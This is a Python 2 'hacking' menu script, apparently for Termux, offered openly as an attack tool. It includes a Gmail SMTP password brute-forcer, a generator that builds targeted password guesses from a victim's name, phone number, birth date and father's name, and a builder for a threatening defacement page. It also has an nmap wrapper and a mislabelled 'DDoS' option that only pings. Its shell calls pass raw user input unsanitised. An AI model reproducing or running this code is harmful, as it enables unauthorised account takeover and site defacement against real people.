import os
white = "\033[1;37m"
normal = "\033[0;00m"
red = "\033[1;31m"
blue = "\033[1;34m"
green = "\033[1;32m"
lightblue = "\033[0;34m"
os.system('clear')
print("\033[0;32m                             @@                           @/")
print("                           @@@                               @@@")
print("                        %@@@                                   @@@.")
print("                      @@@@@                                     @@@@%")
print("                     @@@@@                                       @@@@@")
print("                    @@@@@@@                  @                  @@@@@@@")
print("                    @(@@@@@@@%            @@@@@@@            &@@@@@@@@@")
print("                    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
print("                     @@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@")
print("                       @@@( @@@@@#@@@@@@@@@*@@@,@@@@@@@@@@@@@@@  @@@")
print("                           @@@@@@ .@@@/@@@@@@@@@@@@@/@@@@ @@@@@@")
print("                                  @@@   @@@@@@@@@@@   @@@")
print("                                 @@@@*  ,@@@@@@@@@(  ,@@@@")
print("                                 @@@@@@@@@@@@@@@@@@@@@@@@@")
print("                                  @@@.@@@@@@@@@@@@@@@ @@@")
print("                                    @@@@@@ @@@@@ @@@@@@")
print("                                       @@@@@@@@@@@@@")
print("                                       @@   @@@   @@")
print("                                       @@ @@@@@@@ @@")
print("                                         @@% @  @@")
os.system('sleep 3')
pass
pass
pass
pass
pass
pass
#python 3.6
print (" \033[96m        1-Hack Email")
print (" \033[95m        2-Scan Port,s")
print (" \033[94m        3-Ddos Attack")
print ("  \033[92m       4-Hash /")
print ("         5-Hack FB")
print ("  \033[92m       6-Password List")
print ("  \033[95m       7-MaKe IndeX ")
print ("   \033[91m      8-Install && UpdatE")
print ("         0-ExiT")
im = raw_input("TMX >>!")
if im == '1':
 print ("         ._________________.")
 print ("         | _______________ |")
 print ("         | I             I |")
 print ("         | I             I |")
 print ("         | I             I |")
 print ("         | I             I |")
 print ("         | I_____________I |")
 print ("         !_________________!")
 print ("            ._[_______]_.")
 print ("        .___|___________|___.")
 print ("        |::: ____           |")
 print ("        |    ~~~~ [CD-ROM]  |")
 print ("        !___________________!") 
 import smtplib
 smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
 smtpserver.ehlo()
 smtpserver.starttls()
 mail=raw_input("Enter Email Hack :")
 passwor = raw_input("Enter List Password :")
 passwor = open(passwor, "r")
 for wh in passwor:
         try:
                 smtpserver.login(mail, wh)
                 print ("\033[1;31m !! Found PassWord >> ", wh)
                 break;
         except:
                 smtplib.SMTPAuthenticationError
                 print ('[*] Not Found PassWord >>', wh)
if im == '2':
 import os
 print("                            / /         / /")
 print("                            / \_______ /|_/")
 print("                            /          /_/ \__")
 print("                           /             \_/ /")
 print("                         _|_              |/|_")
 print("                         _|_  O    _    O  _|_")
 print("                         _|_      (_)      _|_")
 print("                          \                 /")
 print("                           _\_____________/_")
 print("                          /  \/  (___)  \/  /")
 print("                          \__(  o     o  )__/")

 ip=raw_input("Enter IP :")
 os.system('nmap ' + ip)
if im == '3':
 import os
 ip1=raw_input("Enter IP Website :")
 os.system('ping ' + ip1)
if im == '4':
 import hashlib
 text = raw_input("Enter a text to hash: ")
 i = hashlib.new("md5")
 text = text.encode("utf-8")
 i.update(text)
 a = i.hexdigest()
 print(a)
if im == '5':
 import os
 os.system(' python2 fb.py') 
if im == '6':
 import os
 white = "\033[1;37m"
 normal = "\033[0;00m"
 red = "\033[1;31m"
 blue = "\033[1;34m"
 green = "\033[1;32m"
 lightblue = "\033[0;34m"
 print ("\033[1;35m                         ._________________.")
 print ("                         | _______________ |")
 print ("                         | I             I |")
 print ("                         | I             I |")
 print ("                         | I m o m u i l I |")
 print ("                         | I             I |")
 print ("                         | I_____________I |")
 print ("                         !_________________!")
 print ("                            ._[_______]_.")
 print ("                        .___|___________|___.")
 print ("                        |::: ____           |")
 print ("                        |    ~~~~ [CD-ROM]  |")
 print ("                        !___________________!")
 pass
 pass
 pass
 val=raw_input('\033[1;36m Enter Name Frindes :')
 i=raw_input('\033[1;32m Enter The Name :')
 l=raw_input('\033[1;33mEnter Number Phone :')
 o=raw_input('\033[1;34m Enter Date of birth :')
 g=raw_input('\033[1;35m Enter Name Father :')
 a=('2018')
 b=('2017')
 k=('2016')
 q=('12345')
 v=('1212')
 x=('1122')
 z=('1010')
 ii=('1234567890')
 pp=('12345678910')
 oo=('1234512345')
 pass
 pass
 pass
 pass
 pass
 pass
 pass
 pass
 f=open('password.txt','w')
 f.write("\n"+i+l)
 f.write("\n"+l+i)
 f.write("\n"+i+o)
 f.write("\n"+o+i)
 f.write("\n"+o+l)
 f.write("\n"+i+g)
 f.write("\n"+g+i)
 f.write("\n"+i+a)
 f.write("\n"+i+v)
 f.write("\n"+i+ii)
 f.write("\n"+i+oo)
 f.write("\n"+i+z)
 f.write("\n"+i+k)
 f.write("\n"+l+pp)
 f.write("\n"+g+k)
 f.write("\n"+o+z)
 f.write('qwerqwer \n')
 f.write('zxcvzxcv')
 f.write("\n"+i+pp)
 f.write("\n"+o+k)
 f.write("\n"+o+pp)
 f.write("\n"+o+oo)
 f.write("\n"+pp)
 f.write("\n"+i+ii)
 f.write("\n"+pp+oo)
 f.write('\n mastermaster')
 f.write('\n password')
 f.write('\n monkymonky')
 f.write('\n xnxxxnxx')
 f.write('\n tiggertigger')
 f.write('\n alialiali')
 f.write('\n ahmedahmed')
 f.write('\n hackerhacker')
 f.write('\n hackhack')
 f.write('\n 987654321')
 f.write('\n 0987654321')
 f.write('\n 19921922')
 f.write('\n 20002000')
 f.write('\n 20182018')
 f.write('\n qwerty123')
 f.write('\n 19911991')
 f.write('\n 0102030405')
 f.write('\n 102030405060708090')
 f.write('\n 12121212')
 f.write('\n qwerty1')
 f.write("\n"+i+'00000')
 f.write("\n"+oo+pp)
 f.write("\n"+l+g)
 f.write("\n"+val+i)
 f.write("\n"+val+l)
 f.write("\n"+val+pp)
 f.write("\n"+val+g)
 f.write("\n"+val+o)
 f.write("\n"+val+k)
 f.write("\n"+val+a)
 f.write("\n"+val+z)
 f.write("\n"+val+x)
 f.write("\n"+val+v)
 f.write("\n"+v+val)
 f.write("\n"+x+val)
 f.write("\n"+o+val)
 f.write("\n"+a+val)
 f.write("\n"+o+val)
 f.write('\n imhacker')
 f.write('\n fuckfuck')
 f.write("\n"+val+q)
 f.write("\n"+val+pp)
 f.write("\n"+val+oo)
 f.write("\n"+val+ii)
 f.write("\n"+ii+val)
 f.write("\n"+oo+val)
 f.write("\n"+pp+val)
 f.write('\n okokokok')
 f.write("\n"+i+i)
 f.write("\n"+l+l)
 f.write("\n"+g+g)
 f.write("\n"+o+o)
 f.write("\n"+val+val)
 f.write("\n flowrflowr")
 f.write("\n minecraft")
 f.write("\n 789456123")
 f.write("\n"+i+'555')
 f.write("\n"+i+'789')
 f.write("\n 10"+i+'10')
 f.write("\n qwert"+i) 
 f.write("\n 1122334455"+i)
 f.close()
 print ("         \033[1;36m  Please Loading ./")
 os.system('sleep 1')
 print ("           Please Loading ../")
 os.system('sleep 1')
 print ("           Please Loading .../")
 os.system('sleep 1')
 print ("           Please Loading ..../")
 os.system('sleep 1')
 print ("           Please Loading ...../")
 os.system('sleep 1')
 print ("           Please Loading ....../")
 os.system('sleep 1')
 print ("           Please Loading ......./")
 os.system('sleep 1')
 print ("           Please Loading ......../")
 os.system('sleep 1')
 print ("           Please Loading ........./")
 os.system('sleep 1')
 print ("           Please Loading ........../")
 os.system('sleep 1')
 print ("           Please Loading .........../")
 os.system('sleep 1')
 print ("           Please Loading ............/")
 os.system('sleep 1')
 print ("           Please Loading ............./")
 os.system('sleep 1')
 print ("           Please Loading .............../")
 os.system('sleep 1')
 print ("           Please Loading ................./")
 os.system('sleep 1')
 print ("           Please Loading .................../")
 os.system('sleep 1')
 print ("           Please Loading ...................../")
 os.system('sleep 1')
 print ("           Please Loading ......................./")
 os.system('sleep 5')
 print ("         \033[1;36m  Please Loading ./")
 os.system('sleep 1')
 print ("           Please Loading ../")
 os.system('sleep 1')
 print ("           Please Loading .../")
 os.system('sleep 1')
 print ("           Please Loading ..../")
 os.system('sleep 1')
 print ("           Please Loading ...../")
 os.system('sleep 1')
 print ("           Please Loading ....../")
 os.system('sleep 1')
 print ("           Please Loading ......./")
 os.system('sleep 1')
 print ("           Please Loading ......../")
 os.system('sleep 1')
 print ("           Please Loading ........./")
 os.system('sleep 1')
 print ("           Please Loading ........../")
 os.system('sleep 1')
 print ("           Please Loading .........../")
 os.system('sleep 1')
 print ("           Please Loading ............/")
 os.system('sleep 1')
 print ("           Please Loading ............./")
 os.system('sleep 1')
 print ("           Please Loading .............../")
 os.system('sleep 1')
 print ("           Please Loading ................./")
 os.system('sleep 1')
 print ("           Please Loading .................../")
 os.system('sleep 1')
 print ("           Please Loading ...................../")
 os.system('sleep 1')
 print ("           Please Loading ......................./")
 os.system('sleep 5')
 print ("\n")
 print ("\n")
 print ("  	 	 ===============> NameList :> password.txt")

if im == '7':
 import os
 print (' Please Download Thw Images')
 os.system('sleep 3')
 os.system('termux-open-url https://drive.google.com/file/d/1zxbHOsLRUvTVuzohNOjuFrD9gE0_s9_j/view?usp=drivesdk ')
 iraqi=raw_input('Enter Your Name :')
 iraqi2=raw_input('Enter Your URL FacebOok :')
 ver=open('YourPage.html' , 'w')
 ver.write('<!DOCTYPE>')
 ver.write('<html>')
 ver.write('<head>')
 ver.write('<link href="YourPage2.css" rel="stylesheet" type="text/css">')
 ver.write('</head>')
 ver.write('<body>')
 ver.write('<center> <img src="gj.png" width="600" height="650" > </center>')
 ver.write('<form style="color:red"  class="borg">')
 ver.write('<br>')
 ver.write('<br>')
 ver.write('<br>')
 ver.write('<p> Your site has been compromised by '+iraqi+' and I will destroy you and ')
 ver.write('withdraw all your information !! (: Fucking Your Secirety  </p>')
 ver.write('</form>')
 ver.write('<form class="momuil">')
 ver.write('<ul> 	<img src="gj.png" width="400" height="450">')
 ver.write('</form>')
 ver.write('<form class="m2">')
 ver.write('<ul><ul> <ul> <img src="gj.png" width="400" height="450">')
 ver.write('</form>')
 ver.write('<form style="color:red" class="mj">')
 ver.write(' <a href= '+iraqi2+' >My Account FB  </a>')
 ver.write('</form>')
 ver.write('</body>')
 ver.write('</html>')
 ver.close()
 vio=open('YourPage2.css' , 'w')
 vio.write('body{')
 vio.write('background-color: black;')
 vio.write('}')
 vio.write('.borg{')
 vio.write('font-size: 30px;')
 vio.write('}')
 vio.write('.momuil{')
 vio.write('margin-top: 100px;')
 vio.write('float: right;')
 vio.write('}')
 vio.write('.m2{')
 vio.write('float: right;')
 vio.write('}')
 vio.write('.mj{')
 vio.write('font-size: 30px;')
 vio.write('}')
 vio.close()
 os.system('mkdir YourIndex')
 os.system('cd && mv YourPage.html YourIndex && mv YourPage2.css YourIndex ')
 os.system('cd /sdcard && cd Download && mv gj.png $HOME && cd $HOME mv gj.png YourIndex')
 os.system(' mv gj.png YourIndex')
 print ('===> The Index = File YourIndex ')
if im == '8':
 import os
 os.system('apt update && apt upgrade && python2 TMX.py')
if im == '0':
 import os
 print (" Bye Bye ")
 os.system('exit')

